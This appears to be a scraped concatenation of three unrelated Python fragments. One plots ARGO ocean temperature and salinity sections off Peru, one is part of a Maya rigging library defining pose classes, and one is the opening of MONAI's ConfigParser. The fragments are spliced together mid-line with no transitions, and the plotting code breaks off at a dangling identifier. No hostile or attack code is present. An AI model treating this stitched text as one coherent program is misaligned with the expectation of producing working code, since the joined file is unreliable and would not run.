linewidths=0.2,
yincrease=False,
)
lev = conts.levels.copy()
lev = lev[lev != 34.9]
f_ax0.clabel(conts, levels=lev, fontsize=7, inline_spacing=-7)
conts = plot_data_smooth.plot.contour(
x="LATITUDE",
levels=[33.8, 34.8, 35.1],
ax=f_ax0,
colors="k",
linewidths=0.8,
yincrease=False,
)
f_ax0.clabel(conts, fontsize=6.73, inline=True, inline_spacing=-7)
f_ax0.scatter(
psal_raw.LATITUDE,
np.full_like(psal_raw.LATITUDE, 0),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax0.scatter(
psal_raw.LATITUDE,
np.full_like(psal_raw.LATITUDE, depth),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax0.set_xlim(-20, -2)
f_ax0.set_ylim(depth, 0)
f_ax0.set_ylabel("Depth [m]")
f_ax0.set_xlabel("Latitude")
f_ax0.grid(ls="--", alpha=0.5)
### TEMP
plot_data_smooth = (
temp.interpolate_na(dim="LATITUDE")
.rolling(LATITUDE=5, center=True, min_periods=1)
.mean()
)
plot_data_smooth.plot.contourf(
x="LATITUDE",
vmin=4,
vmax=25,
cmap=cmo.cm.thermal,
levels=22,
ax=f_ax1,
yincrease=False,
cbar_kwargs=dict(label="Temperature [°C]", pad=-0.09),
)
conts = plot_data_smooth.plot.contour(
x="LATITUDE",
vmin=4,
vmax=25,
levels=22,
ax=f_ax1,
colors="k",
linewidths=0.2,
yincrease=False,
)
# conts = plot_data_smooth.plot.contour(
# x="LATITUDE",
# vmin=14,
# vmax=29,
# levels=[0],
# ax=f_ax1,
# colors="k",
# linewidths=1,
# yincrease=False,
# )
f_ax1.clabel(conts)
f_ax1.scatter(
temp_raw.LATITUDE,
np.full_like(temp_raw.LATITUDE, 0),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax1.scatter(
temp_raw.LATITUDE,
np.full_like(temp_raw.LATITUDE, depth),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax1.set_ylim(depth, 0)
f_ax1.set_ylabel("Depth [m]")
f_ax1.set_xlabel("Latitude")
f_ax1.grid(ls="--", alpha=0.5)
### REST
(sla.mean(dim=["time", "lon"]) * 100).plot(ax=f_ax2)
f_ax2.axhline(ls="--", c="k", lw=0.5)
f_ax2.set_yticks(np.arange(-5, 5.1, 2))
f_ax2.set_ylim(-5, 5)
f_ax2.set_ylabel("SLA [cm]")
f_ax2.set_xlabel("Latitude")
Q = f_ax2.quiver(
taux.lat[::2],
np.full_like(taux.lat, 0)[::2],
tauy.mean(dim=["time", "lon"])[::2] * 100,
taux.mean(dim=["time", "lon"])[::2] * -100,
units="xy",
scale_units="xy",
scale=1,
width=0.05,
)
f_ax2.quiverkey(
Q,
0.92,
0.85,
1,
r"$1x10^{-2} \frac{N}{m^2}$",
labelpos="E",
coordinates="axes",
fontproperties=dict(size=7),
labelsep=0.02,
)
f_ax2.text(0.885, 0.885, r"$\tau$", transform=f_ax2.transAxes)
f_ax2.grid(ls="--", alpha=0.5)
card_centerx = 1.06
card_centery = 0.5
da = 0.04
arrowprops = dict(arrowstyle="fancy", facecolor="black")
f_ax2.annotate(
"",
xy=(card_centerx + da, card_centery),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.annotate(
"",
xy=(card_centerx - da, card_centery),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.annotate(
"",
xy=(card_centerx, card_centery + da * 7),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.annotate(
"",
xy=(card_centerx, card_centery - da * 7),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.text(
card_centerx + da,
card_centery,
"N",
transform=f_ax2.transAxes,
va="center",
ha="left",
)
f_ax2.text(
card_centerx - da,
card_centery,
"S",
transform=f_ax2.transAxes,
va="center",
ha="right",
)
f_ax2.text(
card_centerx,
card_centery + da * 7,
"W",
transform=f_ax2.transAxes,
va="bottom",
ha="center",
)
f_ax2.text(
card_centerx,
card_centery - da * 7,
"E",
transform=f_ax2.transAxes,
va="top",
ha="center",
)
ssta.mean(dim=["time", "lon"]).rolling(
lat=10, min_periods=1, center=True
).mean().plot(ax=f_ax3)
f_ax3.set_ylabel("SSTA [°C]")
f_ax3.set_xlabel("Latitude")
f_ax3.set_yticks(np.arange(-3.5, 3.51, 1))
f_ax3.set_ylim(-3.5, 3.5)
f_ax3.axhline(ls="--", c="k", lw=0.5)
f_ax3.grid(ls="--", alpha=0.5)
props = dict(boxstyle="round", facecolor="wheat", alpha=0.2)
f_ax0.text(
0.03,
0.95,
"d",
transform=f_ax0.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax1.text(
0.03,
0.95,
"c",
transform=f_ax1.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax2.text(
0.03,
0.9,
"b",
transform=f_ax2.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax3.text(
0.03,
0.9,
"a",
transform=f_ax3.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax3.text(
0,
1.65,
"[a] OSTIA Sea Surface Temperature Anomaly\n"
"[b] (Line) DUACS L4 Sea Level Anomaly\n"
" (Arrows) ASCAT L3 Wind Stress Anomaly",
transform=f_ax3.transAxes,
verticalalignment="top",
horizontalalignment="left",
)
f_ax3.text(
0.6,
1.65,
"Clim: GODAS 1981-2010\n"
"Clim: DUACS L4 1993-2010\n"
"Clim: ASCAT - ERA adjusted 2008-2014\n",
transform=f_ax3.transAxes,
verticalalignment="top",
horizontalalignment="left",
)
f_ax0.text(
0,
-0.3,
"[c] ARGO Vertical Temperature\n" "[d] ARGO Vertical Practical Salinity",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="left",
)
# f_ax0.text(
# 0.6,
# -0.3,
# "Clim: IMARPE 1981-2020",
# transform=f_ax0.transAxes,
# verticalalignment="top",
# horizontalalignment="left",
# )
f_ax0.text(
0,
-0.15,
"Processing: IGP",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="left",
fontsize=9,
)
f_ax0.text(
1,
-0.15,
f"Latest Date: {pd.to_datetime(latest_date.data):%d-%b-%Y}",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="right",
fontsize=9,
)
f_ax0.text(
1,
-0.4,
f"*All plots shown are 30-day average of data points\n within 200nm from the coast",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="right",
fontsize=9,
)
fig.savefig(os.path.join(out_path, f"CoastMVar200nm_{depth}.png"))
fig.savefig(os.path.join(out_path, f"CoastMVar200nm_{depth}.jpeg"), dpi=200)
### PLOT ANOM ###
def makePlot_anom(
psal,
psal_raw,
temp,
temp_raw,
sla,
taux,
tauy,
ssta,
latest_date,
out_path="",
depth=850,
):
fig = plt.figure(constrained_layout=True, figsize=(8, 8), dpi=300)
spec = gridspec.GridSpec(ncols=1, nrows=4, figure=fig, height_ratios=[1, 1, 2, 2])
f_ax0 = fig.add_subplot(spec[3, :])
f_ax1 = fig.add_subplot(spec[2, :], sharex=f_ax0)
f_ax2 = fig.add_subplot(spec[1, :], sharex=f_ax0)
f_ax3 = fig.add_subplot(spec[0, :], sharex=f_ax0)
### SAL
plot_data_smooth = (
psal.interpolate_na(dim="LATITUDE")
.rolling(LATITUDE=5, center=True, min_periods=1)
.mean()
)
plot_data_smooth.plot.contourf(
x="LATITUDE",
vmin=33.5,
vmax=35.1,
cmap=cmo.cm.haline,
levels=33,
ax=f_ax0,
yincrease=False,
cbar_kwargs=dict(label="Salinity", pad=-0.09, ticks=np.arange(33.5, 35.2, 0.2)),
)
conts = plot_data_smooth.plot.contour(
x="LATITUDE",
vmin=33.5,
vmax=35.1,
levels=17,
ax=f_ax0,
colors="k",
linewidths=0.2,
yincrease=False,
)
lev = conts.levels.copy()
lev = lev[lev != 34.9]
f_ax0.clabel(conts, levels=lev, fontsize=7, inline_spacing=-7)
conts = plot_data_smooth.plot.contour(
x="LATITUDE",
levels=[33.8, 34.8, 35.1],
ax=f_ax0,
colors="k",
linewidths=0.8,
yincrease=False,
)
f_ax0.clabel(conts, fontsize=6.73, inline=True, inline_spacing=-7)
f_ax0.scatter(
psal_raw.LATITUDE,
np.full_like(psal_raw.LATITUDE, 0),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax0.scatter(
psal_raw.LATITUDE,
np.full_like(psal_raw.LATITUDE, depth),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax0.set_xlim(-20, -2)
f_ax0.set_ylim(depth, 0)
f_ax0.set_ylabel("Depth [m]")
f_ax0.set_xlabel("Latitude")
f_ax0.grid(ls="--", alpha=0.5)
### TEMP
plot_data_smooth = (
temp.interpolate_na(dim="LATITUDE")
.rolling(LATITUDE=5, center=True, min_periods=1)
.mean()
)
plot_data_smooth.plot.contourf(
x="LATITUDE",
vmin=-3,
vmax=3,
cmap="RdBu_r",
levels=13,
ax=f_ax1,
yincrease=False,
cbar_kwargs=dict(label="Temperature Anomaly [°C]", pad=-0.09),
)
conts = plot_data_smooth.plot.contour(
x="LATITUDE",
vmin=-3,
vmax=3,
levels=13,
ax=f_ax1,
colors="k",
linewidths=0.2,
yincrease=False,
)
conts = plot_data_smooth.plot.contour(
x="LATITUDE",
vmin=-3,
vmax=3,
levels=[0],
ax=f_ax1,
colors="k",
linewidths=1,
yincrease=False,
)
f_ax1.clabel(conts)
f_ax1.scatter(
temp_raw.LATITUDE,
np.full_like(temp_raw.LATITUDE, 0),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax1.scatter(
temp_raw.LATITUDE,
np.full_like(temp_raw.LATITUDE, depth),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax1.set_ylim(depth, 0)
f_ax1.set_ylabel("Depth [m]")
f_ax1.set_xlabel("Latitude")
f_ax1.grid(ls="--", alpha=0.5)
### REST
(sla.mean(dim=["time", "lon"]) * 100).plot(ax=f_ax2)
f_ax2.axhline(ls="--", c="k", lw=0.5)
f_ax2.set_yticks(np.arange(-5, 5.1, 2))
f_ax2.set_ylim(-5, 5)
f_ax2.set_ylabel("SLA [cm]")
f_ax2.set_xlabel("Latitude")
Q = f_ax2.quiver(
taux.lat[::2],
np.full_like(taux.lat, 0)[::2],
tauy.mean(dim=["time", "lon"])[::2] * 100,
taux.mean(dim=["time", "lon"])[::2] * -100,
units="xy",
scale_units="xy",
scale=1,
width=0.05,
)
f_ax2.quiverkey(
Q,
0.92,
0.85,
1,
r"$1x10^{-2} \frac{N}{m^2}$",
labelpos="E",
coordinates="axes",
fontproperties=dict(size=7),
labelsep=0.02,
)
f_ax2.text(0.885, 0.885, r"$\tau$", transform=f_ax2.transAxes)
f_ax2.grid(ls="--", alpha=0.5)
card_centerx = 1.06
card_centery = 0.5
da = 0.04
arrowprops = dict(arrowstyle="fancy", facecolor="black")
f_ax2.annotate(
"",
xy=(card_centerx + da, card_centery),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.annotate(
"",
xy=(card_centerx - da, card_centery),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.annotate(
"",
xy=(card_centerx, card_centery + da * 7),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.annotate(
"",
xy=(card_centerx, card_centery - da * 7),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.text(
card_centerx + da,
card_centery,
"N",
transform=f_ax2.transAxes,
va="center",
ha="left",
)
f_ax2.text(
card_centerx - da,
card_centery,
"S",
transform=f_ax2.transAxes,
va="center",
ha="right",
)
f_ax2.text(
card_centerx,
card_centery + da * 7,
"W",
transform=f_ax2.transAxes,
va="bottom",
ha="center",
)
f_ax2.text(
card_centerx,
card_centery - da * 7,
"E",
transform=f_ax2.transAxes,
va="top",
ha="center",
)
ssta.mean(dim=["time", "lon"]).rolling(
lat=10, min_periods=1, center=True
).mean().plot(ax=f_ax3)
f_ax3.set_ylabel("SSTA [°C]")
f_ax3.set_xlabel("Latitude")
f_ax3.set_yticks(np.arange(-3.5, 3.51, 1))
f_ax3.set_ylim(-3.5, 3.5)
f_ax3.axhline(ls="--", c="k", lw=0.5)
f_ax3.grid(ls="--", alpha=0.5)
props = dict(boxstyle="round", facecolor="wheat", alpha=0.2)
f_ax0.text(
0.03,
0.95,
"d",
transform=f_ax0.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax1.text(
0.03,
0.95,
"c",
transform=f_ax1.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax2.text(
0.03,
0.9,
"b",
transform=f_ax2.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax3.text(
0.03,
0.9,
"a",
transform=f_ax3.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax3.text(
0,
1.65,
"[a] OSTIA Sea Surface Temperature Anomaly\n"
"[b] (Line) DUACS L4 Sea Level Anomaly\n"
" (Arrows) ASCAT L3 Wind Stress Anomaly",
transform=f_ax3.transAxes,
verticalalignment="top",
horizontalalignment="left",
)
f_ax3.text(
0.6,
1.65,
"Clim: GODAS 1981-2010\n"
"Clim: DUACS L4 1993-2010\n"
"Clim: ASCAT - ERA adjusted 2008-2014\n",
transform=f_ax3.transAxes,
verticalalignment="top",
horizontalalignment="left",
)
f_ax0.text(
0,
-0.3,
"[c] ARGO Vertical Temperature Anomaly\n"
"[d] ARGO Vertical Practical Salinity",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="left",
)
f_ax0.text(
0.6,
-0.3,
"Clim: IMARPE 1981-2020",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="left",
)
f_ax0.text(
0,
-0.15,
"Processing: IGP",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="left",
fontsize=9,
)
f_ax0.text(
1,
-0.15,
f"Latest Date: {pd.to_datetime(latest_date.data):%d-%b-%Y}",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="right",
fontsize=9,
)
f_ax0.text(
1,
-0.4,
f"*All plots shown are 30-day average of data points\n within 200nm from the coast",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="right",
fontsize=9,
)
fig.savefig(os.path.join(out_path, f"CoastMVar200nm_anom_{depth}.png"))
fig.savefig(os.path.join(out_path, f"CoastMVar200nm_anom_{depth}.jpeg"), dpi=200)
if __name__ == "__main__":
### LOAD DATASETS ###
OUTPUT = "/data/users/service/ARGO/FLOATS/output/ARGO-plots"
# Date and region bounds
region = [-90, -70, -20, -2.5]
today = datetime.datetime.today()
idate | |
cmds.nodeType(input_value) == 'multiplyDivide':
new_multi.append(input_value)
if new_multi:
multi = new_multi
if not new_multi:
multi = []
attributes = self._get_message_attribute_with_prefix('multiply')
for attribute in attributes:
input_attr = attr.get_attribute_input('%s.%s' % (self.pose_control, attribute), node_only = True)
if input_attr:
inputs = attr.get_inputs(input_attr, node_only = True)
if not inputs:
multiplies.append(input_attr)
return multiplies
def set_input(self, attribute):
"""
Set the input into the weightInput of the no reader.
No readers need to have a connection specified that tells the pose when to turn on.
Args:
attribute (str): The node.attribute name of a connection to feed into the no reader.
"""
pass
def add_pose(self, pose_name):
self._connect_pose(pose_name)
pose_inst = get_pose_instance(pose_name, self.pose_gr)
if pose_inst.get_type() == 'no reader':
pose_inst.set_weight(1)
def get_pose_index(self, pose):
attributes = self._get_pose_string_attributes()
inc = 0
for attribute in attributes:
stored_pose = self._get_named_string_attribute(attribute)
if stored_pose == pose:
return inc
inc += 1
def remove_pose(self, pose_name):
index = self.get_pose_index(pose_name)
pose = self.get_pose(index)
if index == None:
return
if pose != pose_name:
return
attributes = self._get_pose_string_attributes()
attribute = attributes[index]
attr.disconnect_attribute('%s.%s' % (self.pose_control, attribute))
cmds.setAttr('%s.pose%s' % (self.pose_control, (index+1)), '', type = 'string')
self.refresh_multiply_connections()
def get_pose(self, index):
if index == None:
return
pose_attributes = self._get_pose_string_attributes()
if not pose_attributes:
return
if index > (len(pose_attributes)-1):
return
pose = cmds.getAttr('%s.%s' % (self.pose_control, pose_attributes[index]))
return pose
def get_poses(self):
pose_count = self._get_pose_count()
poses = []
for pose_index in range(0, pose_count):
poses.append(self.get_pose(pose_index))
return poses
def refresh_multiply_connections(self):
self._disconnect_multiplies()
self._connect_multiplies()
def attach(self, outputs = None):
#super(PoseNoReader, self).attach(outputs)
if outputs:
self.reconnect_weight_outputs(outputs)
self.refresh_multiply_connections()
self._hide_meshes()
if self.sub_detach_dict:
for key in self.sub_detach_dict:
pose = get_pose_instance(key)
pose.attach(self.sub_detach_dict[pose])
self.sub_detach_dict = {}
def detach(self):
#super(PoseNoReader, self).detach()
self._disconnect_multiplies()
outputs = self.disconnect_weight_outputs()
self._show_meshes()
return outputs
def set_weight(self, value):
"""
Set the weight for no readers in the combo.
No readers have connections specified.
If no connection is specified and connected, this can set the weight.
Args:
value (float): The value to set the weight to.
"""
poses = self.get_poses()
for pose in poses:
pose_inst = get_pose_instance(pose, self.pose_gr)
if pose_inst:
pose_type = pose_inst.get_type()
if pose_type == 'no reader':
pose_inst.set_weight(value)
class PoseCone(PoseBase):
"""
This type of pose reads from a joint or transform, for the defined angle of influence.
"""
def __init__(self, transform = None, description = 'pose'):
super(PoseCone, self).__init__(description)
if transform:
transform = transform.replace(' ', '_')
self.transform = transform
self.axis = 'X'
def _pose_type(self):
return 'cone'
def _get_color_for_axis(self):
if self.axis == 'X':
return 13
if self.axis == 'Y':
return 14
if self.axis == 'Z':
return 6
def _get_axis_rotation(self):
if self.axis == 'X':
return [0,0,-90]
if self.axis == 'Y':
return [0,0,0]
if self.axis == 'Z':
return [90,0,0]
def _get_twist_axis(self):
if self.axis == 'X':
return [0,1,0]
if self.axis == 'Y':
return [1,0,0]
if self.axis == 'Z':
return [1,0,0]
def _get_pose_axis(self):
if self.axis == 'X':
return [1,0,0]
if self.axis == 'Y':
return [0,1,0]
if self.axis == 'Z':
return [0,0,1]
def _create_pose_control(self):
pose_control = super(PoseCone, self)._create_pose_control()
self._position_control(pose_control)
if self.transform:
match = space.MatchSpace(self.transform, pose_control)
match.translation_rotation()
parent = cmds.listRelatives(self.transform, p = True)
if parent:
cmds.parentConstraint(parent[0], pose_control, mo = True)
cmds.setAttr('%s.parent' % pose_control, parent[0], type = 'string')
return pose_control
def _position_control(self, control = None):
if not control:
control = self.pose_control
control = rigs_util.Control(control)
control.set_curve_type('pin_point')
control.rotate_shape(*self._get_axis_rotation())
scale = self.scale + 5
control.scale_shape(scale,scale,scale)
control.color( self._get_color_for_axis() )
def _set_axis_vectors(self, pose_axis = None):
if not pose_axis:
pose_axis = self._get_pose_axis()
self._lock_axis_vector_attributes(False)
cmds.setAttr('%s.axisRotateX' % self.pose_control, pose_axis[0])
cmds.setAttr('%s.axisRotateY' % self.pose_control, pose_axis[1])
cmds.setAttr('%s.axisRotateZ' % self.pose_control, pose_axis[2])
twist_axis = self._get_twist_axis()
cmds.setAttr('%s.axisTwistX' % self.pose_control, twist_axis[0])
cmds.setAttr('%s.axisTwistY' % self.pose_control, twist_axis[1])
cmds.setAttr('%s.axisTwistZ' % self.pose_control, twist_axis[2])
self._lock_axis_vector_attributes(True)
def _lock_axis_vector_attributes(self, bool_value):
axis = ['X','Y','Z']
attributes = ['axisTwist', 'axisRotate']
for a in axis:
for attribute in attributes:
cmds.setAttr('%s.%s%s' % (self.pose_control, attribute, a), l = bool_value)
def _create_attributes(self, control):
super(PoseCone, self)._create_attributes(control)
cmds.addAttr(control, ln = 'translation', at = 'double', k = True, dv = 1)
cmds.addAttr(control, ln = 'rotation', at = 'double', k = True, dv = 1)
cmds.addAttr(control, ln = 'twistOffOn', at = 'double', k = True, dv = 1, min = 0, max = 1)
cmds.addAttr(control, ln = 'maxDistance', at = 'double', k = True, dv = 1)
cmds.addAttr(control, ln = 'maxAngle', at = 'double', k = True, dv = 90)
cmds.addAttr(control, ln = 'maxTwist', at = 'double', k = True, dv = 90)
title = attr.MayaEnumVariable('AXIS_ROTATE')
title.create(control)
pose_axis = self._get_pose_axis()
cmds.addAttr(control, ln = 'axisRotateX', at = 'double', k = True, dv = pose_axis[0])
cmds.addAttr(control, ln = 'axisRotateY', at = 'double', k = True, dv = pose_axis[1])
cmds.addAttr(control, ln = 'axisRotateZ', at = 'double', k = True, dv = pose_axis[2])
title = attr.MayaEnumVariable('AXIS_TWIST')
title.create(control)
twist_axis = self._get_twist_axis()
cmds.addAttr(control, ln = 'axisTwistX', at = 'double', k = True, dv = twist_axis[0])
cmds.addAttr(control, ln = 'axisTwistY', at = 'double', k = True, dv = twist_axis[1])
cmds.addAttr(control, ln = 'axisTwistZ', at = 'double', k = True, dv = twist_axis[2])
cmds.addAttr(control, ln = 'joint', dt = 'string')
if self.transform:
cmds.setAttr('%s.joint' % control, self.transform, type = 'string')
cmds.addAttr(control, ln = 'parent', dt = 'string')
self._lock_axis_vector_attributes(True)
#--- math nodes
def _create_distance_between(self):
distance_between = self._create_node('distanceBetween')
cmds.connectAttr('%s.worldMatrix' % self.pose_control,
'%s.inMatrix1' % distance_between)
if self.transform:
cmds.connectAttr('%s.worldMatrix' % self.transform,
'%s.inMatrix2' % distance_between)
return distance_between
def _create_multiply_matrix(self, moving_transform, pose_control):
multiply_matrix = self._create_node('multMatrix')
if moving_transform:
cmds.connectAttr('%s.worldMatrix' % moving_transform, '%s.matrixIn[0]' % multiply_matrix)
cmds.connectAttr('%s.worldInverseMatrix' % pose_control, '%s.matrixIn[1]' % multiply_matrix)
return multiply_matrix
def _create_vector_matrix(self, multiply_matrix, vector):
vector_product = self._create_node('vectorProduct')
cmds.connectAttr('%s.matrixSum' % multiply_matrix, '%s.matrix' % vector_product)
cmds.setAttr('%s.input1X' % vector_product, vector[0])
cmds.setAttr('%s.input1Y' % vector_product, vector[1])
cmds.setAttr('%s.input1Z' % vector_product, vector[2])
cmds.setAttr('%s.operation' % vector_product, 3)
return vector_product
def _create_angle_between(self, vector_product, vector):
angle_between = self._create_node('angleBetween')
cmds.connectAttr('%s.outputX' % vector_product, '%s.vector1X' % angle_between)
cmds.connectAttr('%s.outputY' % vector_product, '%s.vector1Y' % angle_between)
cmds.connectAttr('%s.outputZ' % vector_product, '%s.vector1Z' % angle_between)
cmds.setAttr('%s.vector2X' % angle_between, vector[0])
cmds.setAttr('%s.vector2Y' % angle_between, vector[1])
cmds.setAttr('%s.vector2Z' % angle_between, vector[2])
return angle_between
def _remap_value_angle(self, angle_between):
remap = self._create_node('remapValue', 'angle')
cmds.connectAttr('%s.angle' % angle_between, '%s.inputValue' % remap)
cmds.setAttr('%s.value[0].value_Position' % remap, 0)
cmds.setAttr('%s.value[0].value_FloatValue' % remap, 1)
cmds.setAttr('%s.value[1].value_Position' % remap, 1)
cmds.setAttr('%s.value[1].value_FloatValue' % remap, 0)
cmds.setAttr('%s.inputMax' % remap, 180)
return remap
def _remap_value_distance(self, distance_between):
remap = self._create_node('remapValue', 'distance')
cmds.connectAttr('%s.distance' % distance_between, '%s.inputValue' % remap)
cmds.setAttr('%s.value[0].value_Position' % remap, 0)
cmds.setAttr('%s.value[0].value_FloatValue' % remap, 1)
cmds.setAttr('%s.value[1].value_Position' % remap, 1)
cmds.setAttr('%s.value[1].value_FloatValue' % remap, 0)
cmds.setAttr('%s.inputMax' % remap, 1)
return remap
def _fix_remap_value_distance(self):
input_value = attr.get_attribute_input('%s.translation' % self.pose_control, node_only = True)
key_input = attr.get_attribute_input('%s.input' % input_value)
if key_input:
return
if not cmds.objExists('remapValue3'):
distance = self._get_named_message_attribute('distanceBetween1')
remap = self._remap_value_distance(distance)
input_value = attr.get_attribute_input('%s.translation' % self.pose_control, node_only = True)
if input_value:
if cmds.nodeType(input_value).startswith('animCurve'):
cmds.connectAttr('%s.outValue' % remap, '%s.input' % input_value)
def _multiply_remaps(self, remap, remap_twist):
multiply = self._create_node('multiplyDivide')
cmds.connectAttr('%s.outValue' % remap, '%s.input1X' % multiply)
cmds.connectAttr('%s.outValue' % remap_twist, '%s.input2X' % multiply)
blend = self._create_node('blendColors')
cmds.connectAttr('%s.outputX' % multiply, '%s.color1R' % blend)
cmds.connectAttr('%s.outValue' % remap, '%s.color2R' % blend)
cmds.connectAttr('%s.twistOffOn' % self.pose_control, ' %s.blender' % blend)
return blend
def _create_pose_math_nodes(self, multiply_matrix, axis):
vector_product = self._create_vector_matrix(multiply_matrix, axis)
angle_between = self._create_angle_between(vector_product, axis)
if self._get_pose_axis() == axis:
cmds.connectAttr('%s.axisRotateX' % self.pose_control, '%s.input1X' % vector_product)
cmds.connectAttr('%s.axisRotateY' % self.pose_control, '%s.input1Y' % vector_product)
cmds.connectAttr('%s.axisRotateZ' % self.pose_control, '%s.input1Z' % vector_product)
cmds.connectAttr('%s.axisRotateX' % self.pose_control, '%s.vector2X' % angle_between)
cmds.connectAttr('%s.axisRotateY' % self.pose_control, '%s.vector2Y' % angle_between)
cmds.connectAttr('%s.axisRotateZ' % self.pose_control, '%s.vector2Z' % angle_between)
if self._get_twist_axis() == axis:
cmds.connectAttr('%s.axisTwistX' % self.pose_control, '%s.input1X' % vector_product)
| |
# Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import importlib
import json
import re
from copy import deepcopy
from pathlib import Path
from typing import Any, Dict, Optional, Sequence, Tuple, Union
from monai.bundle.config_item import ComponentLocator, ConfigComponent, ConfigExpression, ConfigItem
from monai.bundle.reference_resolver import ReferenceResolver
from monai.bundle.utils import ID_SEP_KEY, MACRO_KEY
from monai.config import PathLike
from monai.utils import ensure_tuple, look_up_option, optional_import
yaml, _ = optional_import("yaml")
__all__ = ["ConfigParser"]
class ConfigParser:
"""
The primary configuration parser. It traverses a structured config (in the form of nested Python dict or list),
creates ``ConfigItem``, and assign unique IDs according to the structures.
This class provides convenient access to the set of ``ConfigItem`` of the config by ID.
A typical workflow of config parsing is as follows:
- Initialize ``ConfigParser`` with the ``config`` source.
- Call ``get_parsed_content()`` to get expected component with `id`.
.. code-block:: python
from monai.bundle import ConfigParser
config = {
"my_dims": 2,
"dims_1": "$@my_dims + 1",
"my_xform": {"_target_": "LoadImage"},
"my_net": {"_target_": "BasicUNet", "spatial_dims": "@dims_1", "in_channels": 1, "out_channels": 4},
"trainer": {"_target_": "SupervisedTrainer", "network": "@my_net", "preprocessing": "@my_xform"}
}
# in the example $@my_dims + 1 is an expression, which adds 1 to the value of @my_dims
parser = ConfigParser(config)
# get/set configuration content, the set method should happen before calling parse()
print(parser["my_net"]["in_channels"]) # original input channels 1
parser["my_net"]["in_channels"] = 4 # change input channels to 4
print(parser["my_net"]["in_channels"])
# instantiate the network component
parser.parse(True)
net = parser.get_parsed_content("my_net", instantiate=True)
print(net)
# also support to get the configuration content of parsed `ConfigItem`
trainer = parser.get_parsed_content("trainer", instantiate=False)
print(trainer)
Args:
config: input config source to parse.
excludes: when importing modules to instantiate components,
excluding components from modules specified in ``excludes``.
globals: pre-import packages as global variables to ``ConfigExpression``,
so that expressions, for example, ``"$monai.data.list_data_collate"`` can use ``monai`` modules.
The current supported globals and alias names are
``{"monai": "monai", "torch": "torch", "np": "numpy", "numpy": "numpy"}``.
These are MONAI's minimal dependencies.
See also:
- :py:class:`monai.bundle.ConfigItem`
- :py:class:`monai.bundle.scripts.run`
"""
suffixes = ("json", "yaml", "yml")
suffix_match = rf".*\.({'|'.join(suffixes)})"
path_match = rf"({suffix_match}$)"
meta_key = "_meta_" # field key to save metadata
def __init__(
self,
config: Any = None,
excludes: Optional[Union[Sequence[str], str]] = None,
globals: Optional[Dict[str, Any]] = None,
):
self.config = None
self.globals: Dict[str, Any] = {}
globals = {"monai": "monai", "torch": "torch", "np": "numpy", "numpy": "numpy"} if globals is None else globals
if globals is not None:
for k, v in globals.items():
self.globals[k] = importlib.import_module(v) if isinstance(v, str) else v
self.locator = ComponentLocator(excludes=excludes)
self.ref_resolver = ReferenceResolver()
if config is None:
config = {self.meta_key: {}}
self.set(config=config)
def __repr__(self):
return f"{self.config}"
def __getitem__(self, id: Union[str, int]):
"""
Get the config by id.
Args:
id: id of the ``ConfigItem``, ``"#"`` in id are interpreted as special characters to
go one level further into the nested structures.
Use digits indexing from "0" for list or other strings for dict.
For example: ``"xform#5"``, ``"net#channels"``. ``""`` indicates the entire ``self.config``.
"""
if id == "":
return self.config
config = self.config
for k in str(id).split(self.ref_resolver.sep):
if not isinstance(config, (dict, list)):
raise ValueError(f"config must be dict or list for key `{k}`, but got {type(config)}: {config}.")
indexing = k if isinstance(config, dict) else int(k)
config = config[indexing]
return config
def __setitem__(self, id: Union[str, int], config: Any):
"""
Set config by ``id``. Note that this method should be used before ``parse()`` or ``get_parsed_content()``
to ensure the updates are included in the parsed content.
Args:
id: id of the ``ConfigItem``, ``"#"`` in id are interpreted as special characters to
go one level further into the nested structures.
Use digits indexing from "0" for list or other strings for dict.
For example: ``"xform#5"``, ``"net#channels"``. ``""`` indicates the entire ``self.config``.
config: config to set at location ``id``.
"""
if id == "":
self.config = config
self.ref_resolver.reset()
return
keys = str(id).split(self.ref_resolver.sep)
